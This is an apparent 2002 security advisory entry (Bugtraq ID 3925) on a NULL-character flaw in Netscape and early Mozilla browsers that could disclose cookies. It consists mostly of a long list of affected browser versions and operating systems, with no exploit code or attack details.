
Netscape/Mozilla NULL Character Can Lead to Cookie Information Disclosure


Published: 2002-01-25
Updated: 2002-01-25
Severity:
Threat level: server information disclosure
Error type: input validation error
Exploitation mode: server mode

BUGTRAQ ID: 3925

Affected systems
Mozilla Browser 0.9.2.1
   - Apple MacOS 9.0
   - Apple MacOS 9.0.4
   - Apple MacOS 9.1
   - Apple MacOS 9.2
   - Apple MacOS 9.2.1
   - Apple MacOS X 10.0
   - Apple MacOS X 10.0.1
   - Apple MacOS X 10.0.2
   - Apple MacOS X 10.0.3
   - Apple MacOS X 10.0.4
   - Apple MacOS X 10.1
   - Apple MacOS X 10.1.1
   - Apple MacOS X 10.1.2
   - Microsoft Windows 95
   - Microsoft Windows 98
   - Microsoft Windows ME
   - Microsoft Windows NT 4.0
   - Microsoft Windows NT 4.0SP1
   - Microsoft Windows NT 4.0SP2
   - Microsoft Windows NT 4.0SP3
   - Microsoft Windows NT 4.0SP4
   - Microsoft Windows NT 4.0SP5
   - Microsoft Windows NT 4.0SP6a
   - Microsoft Windows XP
Mozilla Browser 0.9.2
   - Apple MacOS 9.0
   - Apple MacOS 9.0.4
   - Apple MacOS 9.1
   - Apple MacOS 9.2
   - Apple MacOS 9.2.1
   - Apple MacOS X 10.0
   - Apple MacOS X 10.0.1
   - Apple MacOS X 10.0.2
   - Apple MacOS X 10.0.3
   - Apple MacOS X 10.0.4
   - Apple MacOS X 10.1
   - Apple MacOS X 10.1.1
   - Apple MacOS X 10.1.2
   - Microsoft Windows 95
   - Microsoft Windows 98
   - Microsoft Windows ME
   - Microsoft Windows NT 4.0
   - Microsoft Windows NT 4.0SP1
   - Microsoft Windows NT 4.0SP2
   - Microsoft Windows NT 4.0SP3
   - Microsoft Windows NT 4.0SP4
   - Microsoft Windows NT 4.0SP5
   - Microsoft Windows NT 4.0SP6a
   - Microsoft Windows XP
Mozilla Browser 0.9.3
   - Apple MacOS 9.0
   - Apple MacOS 9.0.4
   - Apple MacOS 9.1
   - Apple MacOS 9.2
   - Apple MacOS 9.2.1
   - Apple MacOS X 10.0
   - Apple MacOS X 10.0.1
   - Apple MacOS X 10.0.2
   - Apple MacOS X 10.0.3
   - Apple MacOS X 10.0.4
   - Apple MacOS X 10.1
   - Apple MacOS X 10.1.1
   - Apple MacOS X 10.1.2
   - Microsoft Windows 95
   - Microsoft Windows 98
   - Microsoft Windows ME
   - Microsoft Windows NT 4.0
   - Microsoft Windows NT 4.0SP1
   - Microsoft Windows NT 4.0SP2
   - Microsoft Windows NT 4.0SP3
   - Microsoft Windows NT 4.0SP4
   - Microsoft Windows NT 4.0SP5
   - Microsoft Windows NT 4.0SP6a
   - Microsoft Windows XP
Mozilla Browser 0.9.4.1
   - Apple MacOS 9.0
   - Apple MacOS 9.0.4
   - Apple MacOS 9.1
   - Apple MacOS 9.2
   - Apple MacOS 9.2.1
   - Apple MacOS X 10.0
   - Apple MacOS X 10.0.1
   - Apple MacOS X 10.0.2
   - Apple MacOS X 10.0.3
   - Apple MacOS X 10.0.4
   - Apple MacOS X 10.1
   - Apple MacOS X 10.1.1
   - Apple MacOS X 10.1.2
   - Microsoft Windows 95
   - Microsoft Windows 98
   - Microsoft Windows ME
   - Microsoft Windows NT 4.0
   - Microsoft Windows NT 4.0SP1
   - Microsoft Windows NT 4.0SP2
   - Microsoft Windows NT 4.0SP3
   - Microsoft Windows NT 4.0SP4
   - Microsoft Windows NT 4.0SP5
   - Microsoft Windows NT 4.0SP6a
   - Microsoft Windows XP
Mozilla Browser 0.9.4
   - Apple MacOS 9.0
   - Apple MacOS 9.0.4
   - Apple MacOS 9.1
   - Apple MacOS 9.2
   - Apple MacOS 9.2.1
   - Apple MacOS X 10.0
   - Apple MacOS X 10.0.1
   - Apple MacOS X 10.0.2
   - Apple MacOS X 10.0.3
   - Apple MacOS X 10.0.4
   - Apple MacOS X 10.1
   - Apple MacOS X 10.1.1
   - Apple MacOS X 10.1.2
   - Microsoft Windows 95
   - Microsoft Windows 98
   - Microsoft Windows ME
   - Microsoft Windows NT 4.0
   - Microsoft Windows NT 4.0SP1
   - Microsoft Windows NT 4.0SP2
   - Microsoft Windows NT 4.0SP3
   - Microsoft Windows NT 4.0SP4
   - Microsoft Windows NT 4.0SP5
   - Microsoft Windows NT 4.0SP6a
   - Microsoft Windows XP
Mozilla Browser 0.9.5
   - Apple MacOS 9.0
   - Apple MacOS 9.0.4
   - Apple MacOS 9.1
   - Apple MacOS 9.2
   - Apple MacOS 9.2.1
   - Apple MacOS X 10.0
   - Apple MacOS X 10.0.1
   - Apple MacOS X 10.0.2
   - Apple MacOS X 10.0.3
   - Apple MacOS X 10.0.4
   - Apple MacOS X 10.1
   - Apple MacOS X 10.1.1
   - Apple MacOS X 10.1.2
   - Microsoft Windows 95
   - Microsoft Windows 98
   - Microsoft Windows ME
   - Microsoft Windows NT 4.0
   - Microsoft Windows NT 4.0SP1
   - Microsoft Windows NT 4.0SP2
   - Microsoft Windows NT 4.0SP3
   - Microsoft Windows NT 4.0SP4
   - Microsoft Windows NT 4.0SP5
   - Microsoft Windows NT 4.0SP6a
   - Microsoft Windows XP
Mozilla Browser 0.9.6
   - Apple MacOS 9.0
   - Apple MacOS 9.1
   - Apple MacOS 9.2
   - Be BeOS 5.0
   - BSDI BSD/OS 4.2
   - Compaq OpenVMS 7.1-2 Alpha
   - Compaq OpenVMS 7.2-2 Alpha
   - Compaq OpenVMS 7.3 Alpha
   - FreeBSD FreeBSD 4.0
   - IBM AIX 4.3.3
   - Microsoft Windows 2000 Workstation
   - Microsoft Windows 2000 Workstation SP1
   - Microsoft Windows 2000 Workstation SP2
   - Microsoft Windows 95
   - Microsoft Windows 98
   - Microsoft Windows ME
   - Microsoft Windows NT 4.0
   - Microsoft Windows NT 4.0SP1
   - Microsoft Windows NT 4.0SP2
   - Microsoft Windows NT 4.0SP3
   - Microsoft Windows NT 4.0SP4
   - Microsoft Windows NT 4.0SP5
   - Microsoft Windows NT 4.0SP6
   - Microsoft Windows NT 4.0SP6a
   - RedHat Linux 6.0 alpha
   - RedHat Linux 6.0 i386
   - RedHat Linux 6.0 sparc
   - RedHat Linux 7.0 alpha
   - RedHat Linux 7.0 i386
   - RedHat Linux 7.0 sparc
   - SGI IRIX 6.5
   - Sun Solaris 2.7
   - Sun Solaris 2.8
Netscape Communicator 4.08
   - Caldera eDesktop 2.4
   - Caldera eServer 2.3
   - Caldera OpenLinux Desktop 2.3
   - Caldera OpenLinux eBuilder 3.0
   - Conectiva Linux 3.0
   - Conectiva Linux 4.0
   - Conectiva Linux 4.1
   - Conectiva Linux 5.0
   - Conectiva Linux 5.1
   - MandrakeSoft Linux Mandrake 6.0
   - MandrakeSoft Linux Mandrake 6.1
   - MandrakeSoft Linux Mandrake 7.0
   - MandrakeSoft Linux Mandrake 7.1
   - Microsoft Windows 2000 Workstation
   - Microsoft Windows 95
   - Microsoft Windows 98
   - Microsoft Windows NT 4.0
   - RedHat Linux 5.2 alpha
   - RedHat Linux 5.2 i386
   - RedHat Linux 5.2 sparc
   - RedHat Linux 6.0 alpha
   - RedHat Linux 6.0 i386
   - RedHat Linux 6.0 sparc
   - RedHat Linux 6.1 alpha
   - RedHat Linux 6.1 i386
   - RedHat Linux 6.1 sparc
   - RedHat Linux 6.2 alpha
   - RedHat Linux 6.2 i386
   - RedHat Linux 6.2 sparc
   - S.u.S.E. Linux 7.0
Netscape Communicator 4.07
   - Caldera eDesktop 2.4
   - Caldera eServer 2.3
   - Caldera OpenLinux Desktop 2.3
   - Caldera OpenLinux eBuilder 3.0
   - Conectiva Linux 3.0
   - Conectiva Linux 4.0
   - Conectiva Linux 4.1
   - Conectiva Linux 4.2
   - Conectiva Linux 5.0
   - Conectiva Linux 5.1
   - MandrakeSoft Linux Mandrake 6.0
   - MandrakeSoft Linux Mandrake 6.1
   - MandrakeSoft Linux Mandrake 7.0
   - MandrakeSoft Linux Mandrake 7.1
   - Microsoft Windows 2000 Workstation
   - Microsoft Windows 95
   - Microsoft Windows 98
   - Microsoft Windows NT 4.0
   - RedHat Linux 5.2 alpha
   - RedHat Linux 5.2 i386
   - RedHat Linux 5.2 sparc
   - RedHat Linux 6.0 alpha
   - RedHat Linux 6.0 i386
   - RedHat Linux 6.0 sparc
   - RedHat Linux 6.1 alpha
   - RedHat Linux 6.1 i386
   - RedHat Linux 6.1 sparc
   - RedHat Linux 6.2 alpha
   - RedHat Linux 6.2 i386
   - RedHat Linux 6.2 sparc
   - S.u.S.E. Linux 7.0
Netscape Communicator 4.06
   - Caldera eDesktop 2.4
   - Caldera eServer 2.3
   - Caldera OpenLinux Desktop 2.3
   - Caldera OpenLinux eBuilder 3.0
   - Conectiva Linux 3.0
   - Conectiva Linux 4.0
   - Conectiva Linux 4.1
   - Conectiva Linux 4.2
   - Conectiva Linux 5.0
   - Conectiva Linux 5.1
   - MandrakeSoft Linux Mandrake 6.0
   - MandrakeSoft Linux Mandrake 6.1
   - MandrakeSoft Linux Mandrake 7.0
   - MandrakeSoft Linux Mandrake 7.1
   - Microsoft Windows 2000 Workstation
   - Microsoft Windows 95
   - Microsoft Windows 98
   - Microsoft Windows NT 4.0
   - RedHat Linux 5.2 alpha
   - RedHat Linux 5.2 i386
   - RedHat Linux 5.2 sparc
   - RedHat Linux 6.0 alpha
   - RedHat Linux 6.0 i386
   - RedHat Linux 6.0 sparc
   - RedHat Linux 6.1 alpha
   - RedHat Linux 6.1 i386
   - RedHat Linux 6.1 sparc
   - RedHat Linux 6.2 alpha
   - RedHat Linux 6.2 i386
   - RedHat Linux 6.2 sparc
   - S.u.S.E. Linux 7.0
Netscape Communicator 4.05
   - Caldera eDesktop 2.4
   - Caldera eServer 2.3
   - Caldera OpenLinux Desktop 2.3
   - Caldera OpenLinux eBuilder 3.0
   - Conectiva Linux 3.0
   - Conectiva Linux 4.0
   - Conectiva Linux 4.1
   - Conectiva Linux 4.2
   - Conectiva Linux 5.0
   - Conectiva Linux 5.1
   - MandrakeSoft Linux Mandrake 6.0
   - MandrakeSoft Linux Mandrake 6.1
   - MandrakeSoft Linux Mandrake 7.0
   - MandrakeSoft Linux Mandrake 7.1
   - Microsoft Windows 2000 Workstation
   - Microsoft Windows 95
   - Microsoft Windows 98
   - Microsoft Windows NT 4.0
   - RedHat Linux 5.2 alpha
   - RedHat Linux 5.2 i386
   - RedHat Linux 5.2 sparc
   - RedHat Linux 6.0 alpha
   - RedHat Linux 6.0 i386
   - RedHat Linux 6.0 sparc
   - RedHat Linux 6.1 alpha
   - RedHat Linux 6.1 i386
   - RedHat Linux 6.1 sparc
   - RedHat Linux 6.2 alpha
   - RedHat Linux 6.2 i386
   - RedHat Linux 6.2 sparc
   - S.u.S.E. Linux 7.0
Netscape Communicator 4.04
   - Caldera eDesktop 2.4
   - Caldera eServer 2.3
   - Caldera OpenLinux Desktop 2.3
   - Caldera OpenLinux eBuilder 3.0
   - Conectiva Linux 3.0
   - Conectiva Linux 4.0
   - Conectiva Linux 4.1
   - Conectiva Linux 4.2
   - Conectiva Linux 5.0
   - Conectiva Linux 5.1
   - MandrakeSoft Linux Mandrake 6.0
   - MandrakeSoft Linux Mandrake 6.1
   - MandrakeSoft Linux Mandrake 7.0
   - MandrakeSoft Linux Mandrake 7.1
   - Microsoft Windows 2000 Workstation
   - Microsoft Windows 95
   - Microsoft Windows 98
   - Microsoft Windows NT 4.0
   - RedHat Linux 5.2 alpha
   - RedHat Linux 5.2 i386
   - RedHat Linux 5.2 sparc
   - RedHat Linux 6.0 alpha
   - RedHat Linux 6.0 i386
   - RedHat Linux 6.0 sparc
   - RedHat Linux 6.1 alpha
   - RedHat Linux 6.1 i386
   - RedHat Linux 6.1 sparc
   - RedHat Linux 6.2 alpha
   - RedHat Linux 6.2 i386
   - RedHat Linux 6.2 sparc
   - S.u.S.E. Linux 7.0
Netscape Communicator 4.0
   - Caldera eDesktop 2.4
   - Caldera eServer 2.3
   - Caldera OpenLinux Desktop 2.3
   - Caldera OpenLinux eBuilder 3.0
   - Conectiva Linux 3.0
   - Conectiva Linux 4.0
   - Conectiva Linux 4.1
   - Conectiva Linux 4.2
   - Conectiva Linux 5.0
   - Conectiva Linux 5.1
   - MandrakeSoft Linux Mandrake 6.0
   - MandrakeSoft Linux Mandrake 6.1
   - MandrakeSoft Linux Mandrake 7.0
   - MandrakeSoft Linux Mandrake 7.1
   - Microsoft Windows 2000 Workstation
   - Microsoft Windows 95
   - Microsoft Windows 98
   - Microsoft Windows NT 4.0
   - RedHat Linux 5.2 alpha
   - RedHat Linux 5.2 i386
   - RedHat Linux 5.2 sparc
   - RedHat Linux 6.0 alpha
   - RedHat Linux 6.0 i386
   - RedHat Linux 6.0 sparc
   - RedHat Linux 6.1 alpha
   - RedHat Linux 6.1 i386
   - RedHat Linux 6.1 sparc
   - RedHat Linux 6.2 alpha
   - RedHat Linux 6.2 i386
   - RedHat Linux 6.2 sparc
   - S.u.S.E. Linux 7.0
Netscape Communicator 4.5BETA
Netscape Communicator 4.5
   - Caldera eDesktop 2.4
   - Caldera eServer 2.3
   - Caldera OpenLinux Desktop 2.3
   - Caldera OpenLinux eBuilder 3.0
   - Conectiva Linux 4.1
   - Conectiva Linux 4.2
   - Conectiva Linux 5.0
   - Conectiva Linux 5.1
   - Microsoft Windows 2000 Workstation
   - Microsoft Windows 95
   - Microsoft Windows 98
   - Microsoft Windows NT 4.0
   - RedHat Linux 5.2 alpha
   - RedHat Linux 5.2 i386
   - RedHat Linux 5.2 sparc
   - RedHat Linux 6.0 alpha
   - RedHat Linux 6.0 i386
   - RedHat Linux 6.0 sparc
   - RedHat Linux 6.1 alpha
   - RedHat Linux 6.1 i386
   - RedHat Linux 6.1 sparc
   - RedHat Linux 6.2 alpha
   - RedHat Linux 6.2 i386
   - RedHat Linux 6.2 sparc
   - S.u.S.E. Linux 7.0
Netscape Communicator 4.6
   - Caldera eDesktop 2.4
   - Caldera eServer 2.3
   - Caldera OpenLinux Desktop 2.3
   - Caldera OpenLinux eBuilder 3.0
   - Conectiva Linux 4.1
   - Conectiva Linux 4.2
   - Conectiva Linux 5.0
   - Conectiva Linux 5.1
   - Microsoft Windows 2000 Workstation
   - Microsoft Windows 95
   - Microsoft Windows 98
   - Microsoft Windows NT 4.0
   - RedHat Linux 5.2 alpha
   - RedHat Linux 5.2 i386
   - RedHat Linux 5.2 sparc
   - RedHat Linux 6.0 alpha
   - RedHat Linux 6.0 i386
   - RedHat Linux 6.0 sparc
   - RedHat Linux 6.1 alpha
   - RedHat Linux 6.1 i386
   - RedHat Linux 6.1 sparc
   - RedHat Linux 6.2 alpha
   - RedHat Linux 6.2 i386
   - RedHat Linux 6.2 sparc
   - S.u.S.E. Linux 7.0
Netscape Communicator 4.7
   - Caldera eDesktop 2.4
   - Caldera eServer 2.3
   - Caldera OpenLinux Desktop 2.3
   - Caldera OpenLinux eBuilder 3.0
   - Conectiva Linux 4.1
   - Conectiva Linux 4.2
   - Conectiva Linux 5.0
   - Conectiva Linux 5.1
   - Microsoft Windows 2000 Workstation
   - Microsoft Windows 2000 Workstation SP1
   - Microsoft Windows 2000 Workstation SP2
   - Microsoft Windows 95
   - Microsoft Windows 98
   - Microsoft Windows NT 4.0
   - Microsoft Windows NT 4.0SP1
   - Microsoft Windows NT 4.0SP2
   - Microsoft Windows NT 4.0SP3
   - Microsoft Windows NT 4.0SP4
   - Microsoft Windows NT 4.0SP5
   - Microsoft Windows NT 4.0SP6
   - Microsoft Windows NT 4.0SP6a
   - RedHat Linux 5.2 alpha
   - RedHat Linux 5.2 i386
   - RedHat Linux 5.2 sparc
   - RedHat Linux 6.0 alpha
   - RedHat Linux 6.0 i386
   - RedHat Linux 6.0 sparc
   - RedHat Linux 6.1 alpha
   - RedHat Linux 6.1 i386
   - RedHat Linux 6.1 sparc
   - RedHat Linux 6.2 alpha
   - RedHat Linux 6.2 i386
   - RedHat Linux 6.2 sparc
   - S.u.S.E. Linux 7.0
Netscape Communicator 4.51
   - Caldera eDesktop 2.4
   - Caldera eServer 2.3
   - Caldera OpenLinux Desktop 2.3
   - Caldera OpenLinux eBuilder 3.0
   - Conectiva Linux 4.1
   - Conectiva Linux 4.2
   - Conectiva Linux 5.0
   - Conectiva Linux 5.1
   - Microsoft Windows 2000 Workstation
   - Microsoft Windows 95
   - Microsoft Windows 98
   - Microsoft Windows NT 4.0
   - RedHat Linux 5.2 alpha
   - RedHat Linux 5.2 i386
   - RedHat Linux 5.2 sparc
   - RedHat Linux 6.0 alpha
   - RedHat Linux 6.0 i386
   - RedHat Linux 6.0 sparc
   - RedHat Linux 6.1 alpha
   - RedHat Linux 6.1 i386
   - RedHat Linux 6.1 sparc
   - RedHat Linux 6.2 alpha
   - RedHat Linux 6.2 i386
   - RedHat Linux 6.2 sparc
   - S.u.S.E. Linux 7.0
Netscape Communicator 4.61
   - Caldera eDesktop 2.4
   - Caldera eServer 2.3
   - Caldera OpenLinux Desktop 2.3
   - Caldera OpenLinux eBuilder 3.0
   - Conectiva Linux 4.1
   - Conectiva Linux 4.2
   - Conectiva Linux 5.0
   - Conectiva Linux 5.1
   - Microsoft Windows 2000 Workstation
   - Microsoft Windows 95
   - Microsoft Windows 98
   - Microsoft Windows NT 4.0
   - RedHat Linux 5.2 alpha
   - RedHat Linux 5.2 i386
   - RedHat Linux 5.2 sparc
   - RedHat Linux 6.0 alpha
   - RedHat Linux 6.0 i386
   - RedHat Linux 6.0 sparc
   - RedHat Linux 6.1 alpha
   - RedHat Linux 6.1 i386
   - RedHat Linux 6.1 sparc
   - RedHat Linux 6.2 alpha
   - RedHat Linux 6.2 i386
   - RedHat Linux 6.2 sparc
   - S.u.S.E. Linux 7.0
Netscape Communicator 4.72
   - Caldera eDesktop 2.4
   - Caldera eServer 2.3
   - Caldera OpenLinux Desktop 2.3
   - Caldera OpenLinux eBuilder 3.0
   - Conectiva Linux 4.0
   - Conectiva Linux 4.0es
   - Conectiva Linux 4.1
   - Conectiva Linux 4.2
   - Conectiva Linux 5.0
   - Conectiva Linux 5.1
   - MandrakeSoft Linux Mandrake 6.0
   - MandrakeSoft Linux Mandrake 6.1
   - MandrakeSoft Linux Mandrake 7.0
   - MandrakeSoft Linux Mandrake 7.1
   - Microsoft Windows 2000 Workstation
   - Microsoft Windows 2000 Workstation SP1
   - Microsoft Windows 2000 Workstation SP2
   - Microsoft Windows 95
   - Microsoft Windows 98
   - Microsoft Windows NT 4.0
   - Microsoft Windows NT 4.0SP1
   - Microsoft Windows NT 4.0SP2
   - Microsoft Windows NT 4.0SP3
   - Microsoft Windows NT 4.0SP4
   - Microsoft Windows NT 4.0SP5
   - Microsoft Windows NT 4.0SP6
   - Microsoft Windows NT 4.0SP6a
   - RedHat Linux 5.2 alpha
   - RedHat Linux 5.2 i386
   - RedHat Linux 5.2 sparc
   - RedHat Linux 6.0 alpha
   - RedHat Linux 6.0 i386
   - RedHat Linux 6.0 sparc
   - RedHat Linux 6.1 alpha
   - RedHat Linux 6.1 i386
   - RedHat Linux 6.1 sparc
   - RedHat Linux 6.2 alpha
   - RedHat Linux 6.2 i386
   - RedHat Linux 6.2 sparc
   - S.u.S.E. Linux 7.0
Netscape Communicator 4.73
   - Caldera eDesktop 2.4
   - Caldera eServer 2.3
   - Caldera OpenLinux Desktop 2.3
   - Caldera OpenLinux eBuilder 3.0
   - Conectiva Linux 4.0
   - Conectiva Linux 4.0es
   - Conectiva Linux 4.1
   - Conectiva Linux 4.2
   - Conectiva Linux 5.0
   - Conectiva Linux 5.1
   - MandrakeSoft Linux Mandrake 6.0
   - MandrakeSoft Linux Mandrake 6.1
   - MandrakeSoft Linux Mandrake 7.0
   - MandrakeSoft Linux Mandrake 7.1
   - Microsoft Windows 2000 Workstation
   - Microsoft Windows 2000 Workstation SP1
   - Microsoft Windows 2000 Workstation SP2
   - Microsoft Windows 95
   - Microsoft Windows 98
   - Microsoft Windows 98SE
   - Microsoft Windows NT 4.0
   - Microsoft Windows NT 4.0SP1
   - Microsoft Windows NT 4.0SP2
   - Microsoft Windows NT 4.0SP3
   - Microsoft Windows NT 4.0SP4
   - Microsoft Windows NT 4.0SP5
   - Microsoft Windows NT 4.0SP6
   - Microsoft Windows NT 4.0SP6a
   - RedHat Linux 5.2 alpha
   - RedHat Linux 5.2 i386
   - RedHat Linux 5.2 sparc
   - RedHat Linux 6.0 alpha
   - RedHat Linux 6.0 i386
   - RedHat Linux 6.0 sparc
   - RedHat Linux 6.1 alpha
   - RedHat Linux 6.1 i386
   - RedHat Linux 6.1 sparc
   - RedHat Linux 6.2 alpha
   - RedHat Linux 6.2 i386
   - RedHat Linux 6.2 sparc
   - S.u.S.E. Linux 7.0
Netscape Communicator 4.74
   - Caldera eDesktop 2.4
   - Caldera eServer 2.3
   - Caldera OpenLinux Desktop 2.3
   - Caldera OpenLinux eBuilder 3.0
   - Conectiva Linux 3.0
   - Conectiva Linux 4.0
   - Conectiva Linux 4.1
   - Conectiva Linux 4.2
   - Conectiva Linux 5.0
   - Conectiva Linux 5.1
   - MandrakeSoft Linux Mandrake 6.0
   - MandrakeSoft Linux Mandrake 6.1
   - MandrakeSoft Linux Mandrake 7.0
   - MandrakeSoft Linux Mandrake 7.1
   - Microsoft Windows 2000 Workstation
   - Microsoft Windows 2000 Workstation SP1
   - Microsoft Windows 2000 Workstation SP2
   - Microsoft Windows 95
   - Microsoft Windows 98
   - Microsoft Windows 98SE
   - Microsoft Windows NT 4.0
   - Microsoft Windows NT 4.0SP1
   - Microsoft Windows NT 4.0SP2
   - Microsoft Windows NT 4.0SP3
   - Microsoft Windows NT 4.0SP4
   - Microsoft Windows NT 4.0SP5
   - Microsoft Windows NT 4.0SP6
   - Microsoft Windows NT 4.0SP6a
   - RedHat Linux 5.2 alpha
   - RedHat Linux 5.2 i386
   - RedHat Linux 5.2 sparc
   - RedHat Linux 6.0 alpha
   - RedHat Linux 6.0 i386
   - RedHat Linux 6.0 sparc
   - RedHat Linux 6.1 alpha
   - RedHat Linux 6.1 i386
   - RedHat Linux 6.1 sparc
   - RedHat Linux 6.2 alpha
   - RedHat Linux 6.2 i386
   - RedHat Linux 6.2 sparc
   - S.u.S.E. Linux 7.0
Netscape Communicator 4.75
   - Caldera eDesktop 2.4
   - Caldera eServer 2.3
   - Caldera OpenLinux Desktop 2.3
   - Caldera OpenLinux eBuilder 3.0
   - Conectiva Linux 3.0
   - Conectiva Linux 4.0
   - Conectiva Linux 4.1
   - Conectiva Linux 4.2
   - Conectiva Linux 5.0
   - Conectiva Linux 5.1
   - MandrakeSoft Linux Mandrake 6.0
   - MandrakeSoft Linux Mandrake 6.1
   - MandrakeSoft Linux Mandrake 7.0
   - MandrakeSoft Linux Mandrake 7.1
   - Microsoft Windows 2000 Workstation
   - Microsoft Windows 2000 Workstation SP1
   - Microsoft Windows 2000 Workstation SP2
   - Microsoft Windows 95
   - Microsoft Windows 98
   - Microsoft Windows NT 4.0
   - Microsoft Windows NT 4.0SP1
   - Microsoft Windows NT 4.0SP2
   - Microsoft Windows NT 4.0SP3
   - Microsoft Windows NT 4.0SP4
   - Microsoft Windows NT 4.0SP5
   - Microsoft Windows NT 4.0SP6
   - Microsoft Windows NT 4.0SP6a
   - RedHat Linux 5.2 alpha
   - RedHat Linux 5.2 i386
   - RedHat Linux 5.2 sparc
   - RedHat Linux 6.0 alpha
   - RedHat Linux 6.0 i386
   - RedHat Linux 6.0 sparc
   - RedHat Linux 6.1 alpha
   - RedHat Linux 6.1 i386
   - RedHat Linux 6.1 sparc
   - RedHat Linux 6.2 alpha
   - RedHat Linux 6.2 i386
   - RedHat Linux 6.2 sparc
   - S.u.S.E. Linux 7.0
Netscape Communicator 4.76
   - Caldera eDesktop 2.4
   - Caldera eServer 2.3
   - Caldera OpenLinux 2.3
   - Caldera OpenLinux eBuilder 3.0
   - Conectiva Linux 3.0
   - Conectiva Linux 4.0
   - Conectiva Linux 4.1
   - Conectiva Linux 4.2
   - Conectiva Linux 5.0
   - Conectiva Linux 5.1
   - MandrakeSoft Linux Mandrake 6.0
   - MandrakeSoft Linux Mandrake 6.1
   - MandrakeSoft Linux Mandrake 7.0
   - MandrakeSoft Linux Mandrake 7.1
   - Microsoft Windows 2000 Workstation
   - Microsoft Windows 2000 Workstation SP1
   - Microsoft Windows 2000 Workstation SP2
   - Microsoft Windows 95
   - Microsoft Windows 98
   - Microsoft Windows NT 4.0
   - Microsoft Windows NT 4.0SP1
   - Microsoft Windows NT 4.0SP2
   - Microsoft Windows NT 4.0SP3
   - Microsoft Windows NT 4.0SP4
   - Microsoft Windows NT 4.0SP5
   - Microsoft Windows NT 4.0SP6
   - Microsoft Windows NT 4.0SP6a
   - RedHat Linux 5.2 alpha
   - RedHat Linux 5.2 i386
   - RedHat Linux 5.2 sparc
   - RedHat Linux 6.0 alpha
   - RedHat Linux 6.0 i386
   - RedHat Linux 6.0 sparc
   - RedHat Linux 6.1 alpha
   - RedHat Linux 6.1 i386
   - RedHat Linux 6.1 sparc
   - RedHat Linux 6.2 alpha
   - RedHat Linux 6.2 i386
   - RedHat Linux 6.2 sparc
   - S.u.S.E. Linux 7.0
Netscape Communicator 4.77
   - Caldera eDesktop 2.4
   - Caldera eServer 2.3
   - Caldera OpenLinux Desktop 2.3
   - Caldera OpenLinux eBuilder 3.0
   - Conectiva Linux 3.0
   - Conectiva Linux 4.0
   - Conectiva Linux 4.1
   - Conectiva Linux 4.2
   - Conectiva Linux 5.0
   - Conectiva Linux 5.1
   - MandrakeSoft Linux Mandrake 6.0
   - MandrakeSoft Linux Mandrake 6.1
   - MandrakeSoft Linux Mandrake 7.0
   - MandrakeSoft Linux Mandrake 7.1
   - Microsoft Windows 2000 Workstation
   - Microsoft Windows 2000 Workstation SP1
   - Microsoft Windows 2000 Workstation SP2
   - Microsoft Windows 95
   - Microsoft Windows 98
   - Microsoft Windows NT 4.0
   - Microsoft Windows NT 4.0SP1
   - Microsoft Windows NT 4.0SP2
   - Microsoft Windows NT 4.0SP3
   - Microsoft Windows NT 4.0SP4
   - Microsoft Windows NT 4.0SP5
   - Microsoft Windows NT 4.0SP6
   - Microsoft Windows NT 4.0SP6a
   - RedHat Linux 5.2 alpha
   - RedHat Linux 5.2 i386
   - RedHat Linux 5.2 sparc
   - RedHat Linux 6.0 alpha
   - RedHat Linux 6.0 i386
   - RedHat Linux 6.0 sparc
   - RedHat Linux 6.1 alpha
   - RedHat Linux 6.1 i386
   - RedHat Linux 6.1 sparc
   - RedHat Linux 6.2 alpha
   - RedHat Linux 6.2 i386
   - RedHat Linux 6.2 sparc
   - S.u.S.E. Linux 7.0
Netscape Communicator 4.78
   - Microsoft Windows 2000 Workstation
   - Microsoft Windows 2000 Workstation SP1
   - Microsoft Windows 2000 Workstation SP2
   - Microsoft Windows 2000 Workstation SP3
   - Microsoft Windows 95
   - Microsoft Windows 98
   - Microsoft Windows 98SE
   - Microsoft Windows ME
   - Microsoft Windows NT 4.0
   - Microsoft Windows NT 4.0SP1
   - Microsoft Windows NT 4.0SP2
   - Microsoft Windows NT 4.0SP3
   - Microsoft Windows NT 4.0SP4
   - Microsoft Windows NT 4.0SP5
   - Microsoft Windows NT 4.0SP6
   - Microsoft Windows NT 4.0SP6a
Netscape Netscape 4.77 Mac
   - Apple MacOS 6.0.8
   - Apple MacOS 7.0
   - Apple MacOS 7.0.1
   - Apple MacOS 7.1
   - Apple MacOS 7.1.2
   - Apple MacOS 7.5.1
   - Apple MacOS 7.5.2
   - Apple MacOS 7.5.3
   - Apple MacOS 7.6
   - Apple MacOS 7.6.1
   - Apple MacOS 8.0
   - Apple MacOS 8.1
   - Apple MacOS 8.5
   - Apple MacOS 8.6
   - Apple MacOS 9.0
   - Apple MacOS 9.0.4
   - Apple MacOS 9.1
   - Apple MacOS 9.2
   - Apple MacOS 9.2.1
   - Apple MacOS X 10.0
   - Apple MacOS X 10.0.1
   - Apple MacOS X 10.0.2
   - Apple MacOS X 10.0.3
   - Apple MacOS X 10.0.4
   - Apple MacOS X 10.1
Netscape Netscape 6.0 Mac
Netscape Netscape 6.1
   - Apple MacOS 9.0
   - Apple MacOS 9.0.4
   - Apple MacOS 9.1
   - Apple MacOS 9.2
   - Apple MacOS 9.2.1
   - Apple MacOS X 10.0
   - Apple MacOS X 10.0.1
   - Apple MacOS X 10.0.2
   - Apple MacOS X 10.0.3
   - Apple MacOS X 10.0.4
   - Apple MacOS X 10.1
   - Apple MacOS X 10.1.1
   - Apple MacOS X 10.1.2
   - Microsoft Windows 95
   - Microsoft Windows 98
   - Microsoft Windows ME
   - Microsoft Windows NT 4.0
   - Microsoft Windows NT 4.0SP1
   - Microsoft Windows NT 4.0SP2
   - Microsoft Windows NT 4.0SP3
   - Microsoft Windows NT 4.0SP4
   - Microsoft Windows NT 4.0SP5
   - Microsoft Windows NT 4.0SP6a
   - Microsoft Windows XP
Netscape Netscape 6.2
   - Apple MacOS 9.0
   - Apple MacOS 9.0.4
   - Apple MacOS 9.1
   - Apple MacOS 9.2
   - Apple MacOS 9.2.1
   - Apple MacOS X 10.0
   - Apple MacOS X 10.0.1
   - Apple MacOS X 10.0.2
   - Apple MacOS X 10.0.3
   - Apple MacOS X 10.0.4
   - Apple MacOS X 10.1
   - Apple MacOS X 10.1.1
   - Apple MacOS X 10.1.2
   - Microsoft Windows 95
   - Microsoft Windows 98
   - Microsoft Windows ME
   - Microsoft Windows NT 4.0
   - Microsoft Windows NT 4.0SP1
   - Microsoft Windows NT 4.0SP2
   - Microsoft Windows NT 4.0SP3
   - Microsoft Windows NT 4.0SP4
   - Microsoft Windows NT 4.0SP5
   - Microsoft Windows NT 4.0SP6a
   - Microsoft Windows XP

Not vulnerable
Mozilla Browser 0.9.7
   - Apple MacOS 9.0
